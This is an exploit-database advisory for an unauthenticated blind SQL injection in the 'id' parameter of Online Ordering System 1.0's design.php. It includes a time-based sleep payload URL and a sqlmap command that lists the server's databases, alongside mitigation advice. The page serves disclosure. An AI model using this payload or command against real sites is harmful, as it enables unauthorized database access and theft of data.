Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)

vendor:

Online Ordering System

by:

Suraj Bhosale

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Online Ordering System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2021

Online Ordering System 1.0 – Blind SQL Injection (Unauthenticated)

The Online Ordering System 1.0 is vulnerable to blind SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'id' parameter of the design.php page. By manipulating the SQL queries, an attacker can extract sensitive information from the database or perform unauthorized actions.

Mitigation:

To mitigate this vulnerability, it is recommended to implement input validation and parameterized queries to prevent SQL injection attacks. Additionally, regular security audits and vulnerability assessments should be conducted to identify and address any potential vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u  http://localhost/onlineordering/GPST/admin/design.php?id=9
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
--batch --dbs

3) Using the above command we will get the name of all the database.